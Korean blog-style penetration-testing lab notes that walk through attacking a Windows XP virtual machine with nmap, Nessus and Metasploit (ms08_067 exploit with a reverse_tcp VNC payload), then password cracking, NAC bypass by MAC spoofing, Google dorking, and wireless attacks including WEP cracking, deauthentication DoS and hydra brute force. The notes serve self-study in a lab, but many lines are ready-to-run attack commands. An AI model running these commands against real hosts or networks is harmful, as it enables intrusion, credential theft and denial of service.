xp 모의해킹 실습

xp 환경 설정

  • xp sp1설치
  • ftp서버 실행: 알ftp, 계정정보(ftpuser/ftpuser)
  • 아파치, php, mysql 설치: apm setup, mysql 계정정보(root/apmsetup)

예상 취약점

  • 21번 포트 개방(ftp)
  • 80번 포트 개방 (http)
  • 3306번 포트 개방 (mysql)
  • 계정 비밀번호 취약
  • 원격조정 취약: 이것은 이미 확인한 사항임(원격조정 해킹(ms08_067))

취약점 점검

nessus를 이용, 취약점 스캔

스캔결과 예상된 취약점이 나오는가?: 이것은 별로다. 예상한 것과 전혀 다른 취약점만 나온다.

결과: 여러가지 취약점이 있으나 두개만 사용가능한다. ms08-067, ms03-026. 둘다 great 수준의 취약점이 발견되어 성공 가능했다.

포트스캐닝 결과

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-04 20:17 KST
Nmap scan report for 192.168.149.135
Host is up (0.0077s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3306/tcp open  mysql
5000/tcp open  upnp
MAC Address: 00:0C:29:22:7C:A8 (VMware)

공격1 (자동화 툴 사용)

fasttrack: 세션 얻기 성공! 두 개의 셀을 얻을 수 있다.

metasploit: 원격제어 성공! ms08-067, ms03-026 취약점에 대해 windows/vncinject/reverse_tcp payload를 사용함.

공격2 (수동)

medusa: passowrd dictionary가 핵심인것 같다.

jtr: 이것도 잘 안된다.

chntpw: chntpw live cd로 부팅하여 윈도우 계정을 쉽게 해킹할수 있다.

결론

가정 쉽고 먼저 할수는 것은 fasttrack을 이용하여 셀을 얻는 것이다.

원격조정을 하고 싶다면 nessus로 취약점 점검 후, mestaploit으로 공격하는 것이다. 이번 실습에서는 ms08-067, ms03-026 취약점에 대해 windows/vncinject/reverse_tcp payload를 사용하였다.

비밀번호 해킹에는 질좋은 비밀번호 사전을 가지고 있어야 한다.

윈도우 pc에 직접 물리적 접근이 가능하다면 chntpw로 비밀번호 초기화도 가능하다.

Advertisements

원격조정 해킹(ms08_067)

공격대상 pc 구성

공격 대상은 windows xp sp1이다. vmware에 설치했으나 이것이 sp1인지 아예 없는 것인지 모르겠다. 단 sp2가 적혀있지 않은 것으로 봐서 올드 버젼임은 확실하다. winver 명령어로 확인한다.

%EC%8A%A4%ED%81%AC%EB%A6%B0%EC%83%B7%202012-07-08%20%EC%98%A4%ED%9B%84%2012.09.03.png

nessus 취약점 점검

high 취약점 9개가 검색된다. 그중 ms08_067 미패치 취약점을 공격한다.

metasploit 공격

metasploit 실행

/pentest/exploits/framwork3/msfconsole

nessus에서 찾은 취약점 검색

msf> search ms08_067

공격코드 선택

msf> use windows/smb/ms08_067_netapi

payload 선택

msf> set payload windos/vncinject/reverse_tcp

옵션 선택 후 실행

msf> set LHOST 공격자ip
msf> set RHOST 공격대상ip
msf> exploit

vnc 설치

vnc viewer가 설치되지 않은 경우 공격자 pc에 아래 메세지를 출력한다.

Failed to launch vncviewer. Is is installed and in your path?

원격 실행을 위해 vnc viewer를 설치한다.

apt-get install vncviewer

원격조정 영상

 

nessus 설치

nessus는 ip대역을 스캔하여 대상 단말의 보안 취약점을 점검하는 스캐너 툴이다. 백트랙에서 설치는 아래와 같다.

설치

apt-get install nessus

사용자 추가

/opt/nessus/sbin/nessus-adduser

인증코드 등록 및 플러그인 설치 (시간 소요). 인증코드는 웹사이트에서 등록하고 수령해야 한다.

/opt/nessus/bin/nessus-fetch --register 인증코드

웹브라우져로 접속

https://127.0.0.1:8834

nessus 데몬 실행 방법

/etc/init.d/nessus start

NAC 우회

네트웍 보호를 위해 NAC(Network Access Control)을 적용하게 되는데 이를 우회하는 방법중 <맥정보 변경>을 이용한 것이 있다.

arp테이블을 확인한다.

arp -a

테이블에 ip-mac 정보가 없다면 이를 업데이트 한다. 핑을 날리던 어쩌던… 이 테이블이 업데이트 되기만 하면 된다.

내 pc의 맥주소를 변경한다.

구글 해킹

구글 검색엔진을 이용해 인터넷 자료를 탐색할 수 있다. 직접 사이트에서 검색하는 것이 아니라 구글 서버에 저장된 페이지를 검색하기 때문에 은밀성이 유지된다.

사용법

  • site:사이트주소 검색하고 싶은 것
  • allintitle:index of # 폴더 트리를 검색하여 보여줌
  • inurl:admin # 관리자 페이지를 찾을 수 있을 지도모름
  • cache:hyundai.com # 구글 서버에 저장된 현대차 홈페이지 파일들
  • filetype:pdf # pdf 파일만 검색
  • site:samsung.com filetype:ppt # 삼성전자의 ppt 문서 총 목록 -> 이건 좀 대단한 것 같다.

[도서] BackTrack5 Wireless Penetration Testing

무선랜 세팅

ifconfig wlan0 up
iwlist wlan0 scanning
iwconfig wlan0 essid "mywifi"
dhclient wlan0

모니터 모드 설정

airmon-ng start wlan0

패킷 스니핑

airmon-ng start wlan0
airodump-ng --bssid 맥주소 mon0
iwconfig mon0 channel 11 (스니핑 대상과 채널 동기화)

숨겨진 ssid 알아내기

iwlist wlan0 scanning (ap맥주소 스캔)
airmon-ng start wlan0
wireshart에서 mon0 패킷 수집
aireplay-ng -0 5 -a ap맥주소 mon0 (인증해제 공격)

맥 필터링 우회

airodump-ng -c 11 -a --bssid ap맥주소 mon0
ap에 연결된 승인 클라이언트 맥주소 얻기
macchanger -m 승인된 맥주소 wlan0

wep 인증 우회

airodump-ng mon0 -c 11 --bssid ap맥주소 -w 저장할파일명

패킷챕쳐 후 파일저장(.xor)

aireplay0nbg -1 0 -e (ap의 ssid) -y keystream (파일명.xor) 
-a ap맥주소 -h ??? mon0

명령을 여러개 날리면 DoS공격이 될수 있음

wep 크랙

airodump-ng --bssid ap맥주소 --channel 11 --write 저장할파일명 mon0
패캣 캣쳐 후 파일저장 (.pcap)
data가 수십만개는 되어야 크랙가능(20만개정도)
aireplay-ng -3 -b ap맥주소 -h 클라이언트맥주소
aircrack-ng 저장한파일명.cap

AP 계정 크랙

hydra 192.168.0.1 -L userid.txt -P pwlist.txt -t1 -e ns -f -V http-get /

http인증 크랙도 가능할 것 같다.

인증해제 DoS공격

aireplay-ng --deauth 0 -a ap맥주소 -h ap맥주소 mon0

Evil Twin(맥스푸핑)

Rogue AP